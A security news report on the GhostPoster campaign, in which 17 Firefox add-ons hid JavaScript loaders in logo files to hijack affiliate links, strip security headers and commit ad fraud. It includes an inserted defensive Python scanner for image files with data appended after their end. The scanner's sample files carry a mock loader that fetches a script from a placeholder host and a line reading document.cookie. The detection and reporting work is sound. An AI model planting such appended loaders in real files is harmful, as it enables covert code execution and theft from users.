- A campaign named GhostPoster used malicious logo files in 17 Mozilla Firefox add-ons to deliver malware targeting over 50,000 users.
- The malware hijacks affiliate links, injects tracking codes, removes browser security headers, and commits ad and click fraud.
- The attack uses a multi-stage loader that fetches payloads with low frequency and delays activation to avoid detection.
- The affected add-ons were falsely promoted as VPNs, ad blockers, translators, and utilities but are now removed.
A campaign known as GhostPoster exploited logo files in 17 Mozilla Firefox browser extensions to embed malicious JavaScript that hijacks affiliate links, injects tracking identifiers, and carries out ad and click fraud. This campaign was active through extensions collectively downloaded more than 50,000 times before their removal, according to findings shared by Koi Security.
These add-ons were presented as VPN services, screenshot tools, ad blockers, and unofficial Google Translate versions. The earliest add-on, named Dark Mode, was published in late October 2024. The list includes popular categories such as Free VPN, Screenshot, Weather, Mouse Gesture, and multiple Google Translate variants.
The malicious operation begins when the browser loads an extension's logo file. The extension's loader code searches the image for the marker "===", extracts the JavaScript that follows it, and executes it. This loader contacts external domains such as "www.liveupdt[.]com" or "www.dealctr[.]com" to retrieve the main payload. It waits 48 hours between requests and activates only 10% of the time to reduce the chance of detection.
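The loader technique described above (script appended to an icon file behind a text marker) leaves a simple artifact a reviewer can look for: bytes after the point where the image format says the file ends. The following is an added example for defenders, not code from Koi Security, Mozilla or the extensions in question. It walks a PNG's chunk table to the IEND chunk (or locates a JPEG's end-of-image marker), reports anything trailing it, and flags tails that contain the "===" marker the article reports or that look like JavaScript. The sample files, the script-like regex and the `example.invalid` hostname are constructed for the example.

```python
"""Flag extension image assets that carry data after the image's legitimate end.

Constructed example: the sample files, regex heuristic and hostname are not
taken from any real add-on. The '===' marker is the one reported for GhostPoster.
"""
import re

PNG_SIG = b"\x89PNG\r\n\x1a\n"
JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"

# Loose heuristic for JavaScript-looking text in an appended tail (assumption).
JS_HINT = re.compile(rb"(function\s*\(|=>|fetch\(|XMLHttpRequest|eval\(|document\.)")


def png_end_offset(data: bytes):
    """Walk PNG chunks (length, type, data, CRC) and return the offset just past IEND."""
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length = int.from_bytes(data[pos:pos + 4], "big")
        ctype = data[pos + 4:pos + 8]
        pos += 8 + length + 4          # header + payload + CRC
        if ctype == b"IEND":
            return pos
    return None                        # truncated or malformed chunk table


def image_end_offset(data: bytes):
    """Return (format, offset of the first byte after the real image) or (None, None)."""
    if data.startswith(PNG_SIG):
        return "png", png_end_offset(data)
    if data.startswith(JPEG_SOI):
        # Embedded EXIF thumbnails carry their own EOI, so take the last one.
        # Appended ASCII script will not contain the 0xFFD9 byte pair.
        i = data.rfind(JPEG_EOI)
        return "jpeg", (None if i == -1 else i + len(JPEG_EOI))
    return None, None


def analyze_image(name: str, data: bytes, marker: bytes = b"===") -> dict:
    """Describe any data trailing the image and whether it looks like a loader payload."""
    fmt, end = image_end_offset(data)
    result = {"file": name, "format": fmt, "trailing_bytes": 0,
              "marker_found": False, "script_like": False, "suspicious": False}
    if end is None:
        return result
    tail = data[end:]
    result["trailing_bytes"] = len(tail)
    if tail:
        result["marker_found"] = marker in tail
        result["script_like"] = JS_HINT.search(tail) is not None
        result["suspicious"] = result["marker_found"] or result["script_like"]
    return result


def scan_extension(files: dict) -> list:
    """Given {path: bytes} for an unpacked add-on, return the sorted paths flagged as suspicious."""
    return sorted(p for p, d in files.items() if analyze_image(p, d)["suspicious"])


# --- constructed samples -------------------------------------------------------
def _minimal_png() -> bytes:
    # 1x1 RGB PNG skeleton: signature, IHDR chunk (13 data bytes + CRC), IEND chunk.
    ihdr = (b"\x00\x00\x00\x0dIHDR"
            + b"\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00\x00"
            + b"\x90wS\xde")
    iend = b"\x00\x00\x00\x00IEND\xaeB`\x82"
    return PNG_SIG + ihdr + iend


CLEAN_PNG = _minimal_png()                     # 45 bytes, nothing after IEND
LOADER_TAIL = b"===(function(){fetch('https://update.example.invalid/p.js')})();"
TROJANED_PNG = CLEAN_PNG + LOADER_TAIL         # marker plus script after IEND
TROJANED_JPEG = JPEG_SOI + JPEG_EOI + b"var a=document.cookie;"  # script, no marker

SAMPLE_FILES = {
    "manifest.json": b'{"manifest_version": 2}',
    "icons/clean.png": CLEAN_PNG,
    "icons/logo.png": TROJANED_PNG,
    "icons/logo48.jpg": TROJANED_JPEG,
}

if __name__ == "__main__":
    for path in SAMPLE_FILES:
        print(analyze_image(path, SAMPLE_FILES[path]))
    print("flagged:", scan_extension(SAMPLE_FILES))
```

The PNG side is exact because the chunk table states every length, so a genuine file ends precisely after IEND's CRC; the JPEG side is a heuristic, since JPEG entropy-coded data has no length field. Any trailing bytes at all deserve a look during add-on review; the marker and script checks only rank the findings.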
This payload performs several harmful actions: it hijacks affiliate links to e-commerce sites like Taobao and JD.com, removing commissions from legitimate partners; inserts Google Analytics tracking code into visited pages; strips security headers like Content-Security-Policy and X-Frame-Options that protect against clickjacking and cross-site scripting attacks; and invisibly injects iframes to facilitate ad and click fraud. It also uses CAPTCHA bypass techniques to evade bot detection mechanisms while executing these operations.
“What they actually deliver is a multi-stage malware payload that monitors everything you browse, strips away your browser’s security protections, and opens a backdoor for remote code execution,” stated security researchers Lotan Sery and Noga Gouldman.
Additionally, the malware delays activation for over six days after installation, further reducing the chance of detection. Although not every extension used exactly the same method, all communicated with the same command-and-control infrastructure, indicating a single threat actor employing multiple tactics.
This discovery follows recent exposures of other malicious VPN extensions harvesting user data, including AI conversations and system information. Koi Security emphasized that free VPN promises often conceal surveillance functions rather than privacy protection.